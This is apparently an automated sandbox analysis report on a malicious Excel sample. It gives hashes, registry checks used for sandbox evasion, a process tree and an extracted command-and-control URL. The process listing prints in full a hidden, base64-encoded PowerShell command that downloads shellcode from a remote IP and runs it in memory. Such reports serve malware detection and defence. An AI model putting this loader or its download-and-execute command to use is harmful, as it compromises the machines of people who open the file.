Analysis
-
max time kernel
35s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 22:02
Behavioral task
behavioral1
Sample
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
Resource
win10v2004-20241007-en
General
-
Target
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
-
Size
46KB
-
MD5
a3d7a510ea532c4891ea21a29e0c66bb
-
SHA1
c5dbf470aec1f29ed239cc7aa1c471ab343909ca
-
SHA256
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594
-
SHA512
52383dc88ad45dd62c8b77d38fafe78e1f7377efc939632106b1c043505572ecc78fd5b06f8172ce68dbd09961c05342329b71016aa703fb2b8d5b428cd1e5f9
-
SSDEEP
768:v4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:wSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3544 4988 powershell.exe 83 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 26 3544 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 4988 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 3544 powershell.exe 3544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 3544 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid Process 4988 EXCEL.EXE 4988 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid Process 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 4988 wrote to memory of 3544 4988 EXCEL.EXE 86 PID 4988 wrote to memory of 3544 4988 EXCEL.EXE 86 PID 3544 wrote to memory of 4816 3544 powershell.exe 89 PID 3544 wrote to memory of 4816 3544 powershell.exe 89 PID 4816 wrote to memory of 2616 4816 csc.exe 90 PID 4816 wrote to memory of 2616 4816 csc.exe 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fn04oj2f\fn04oj2f.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC062.tmp" "c:\Users\Admin\AppData\Local\Temp\fn04oj2f\CSCBECD2858FC114E5DAE54E8805167893.TMP"4⤵PID:2616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD543f016c84e8a7b3593e537a400366f63
SHA1cf7c1f7066cce68831b8949426994cc589d17d5f
SHA256eda38949982f16981d9b22952e25afb7e2dba4ad7c064c721565cf93dff912ed
SHA512dbbb7a04b40eb45abf8d4d32609b0d0f090004b02083672b5e7eab8c2c527bd0ef3284ccb74b2a5180b2e8650b3ed494d8c24089b2c1ba7cbd01944f68242776
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD50638ee000b2b3b962ad294e3b222d079
SHA13daa0db1ebf0f2e3b5d1c00e2bcd46deb2dd7a27
SHA256f031db0fbe8759f7bc0c517bdc0051bb995afed6e069d390e9d106c78be91420
SHA512ecc33604fb0efe0112f7324b6d916a4e83f1c81e26aa9d90b875b8ecd9b782fb154d2207fad8217c61a7e1df9cc68915c9286326fb2b50f70fcbf3312f1b0906
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD567fad3f8696eafb0a59036a58dfc948c
SHA1734b794ae1a2c6ea5952be0b52041c235ef865fe
SHA25611b38f88fce48f74d5fe96cd742a93b919a5ba0f50ec9055f426de5c85bd262e
SHA512c9f5e876551dace24d14f70584ee195782c95d6046c323c879e3ae78adde6d811c5102acb0a1d5874849d88b75b383fe0471ec3edef6f71f4b1e0c9cbc834a51
-
Filesize
652B
MD568bdf6bb3c4a442c29a3d0888bbad20b
SHA199bbf44538121c96efbb12588ed32d36d0199658
SHA256220cecfb814b3fcd1c668220d0c93fea93c00bcac269142b874e38eed2df64de
SHA51242f0bc1c56a25a9a727085e52a4334032bdefe0fee1541810ae6bb5b9307c62e63fa7802f444d9a7950aae13ae61b152a1cc85b399a9df553fdea7afdb72006a
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD550ee696a67852204734cd52792ee3ee1
SHA18f0c98527dbf8cfb1a2c5f4c2c3c984bf12e61ac
SHA256f02df8e0abb577b617ed915df45fde5d8ec211e004bdd6615f231d8ac66a59d5
SHA512779f482b226d20d4a9681b9907bb4bd8b587d62a29dc7c45585c0aaf30bf6e3034dea43ff5b21a8df5817f7db7bbf9471d1bea403e0c2acf103466350eee5da5